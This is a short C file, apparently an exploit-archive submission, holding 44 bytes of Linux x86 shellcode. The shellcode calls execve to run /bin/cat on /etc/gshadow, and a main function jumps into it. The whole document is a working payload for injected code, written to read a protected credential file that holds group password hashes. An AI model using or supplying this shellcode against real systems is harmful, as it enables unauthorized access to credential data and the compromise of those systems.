/* # Exploit Title : linux/x86 execve("/bin/cat", ["/bin/cat", "/etc/gshadow"], NULL) - 44 bytes # Exploit Author : Febriyanto Nugroho # Tested on : Linux Debian 5.0.5 */ #include <stdio.h> char shellcode[] = "\x31\xdb" "\x8d\x43\x0b" "\x99" "\x52" "\x68\x2f\x63\x61\x74" "\x68\x2f\x62\x69\x6e" "\x89\xe3" "\x52" "\x68\x61\x64\x6f\x77" "\x68\x2f\x67\x73\x68" "\x68\x2f\x65\x74\x63" "\x89\xe1" "\x52" "\x51" "\x53" "\x89\xe1" "\xcd\x80"; int main(int argc, char **argv) { asm("jmp %0;" : "=m" (shellcode)); }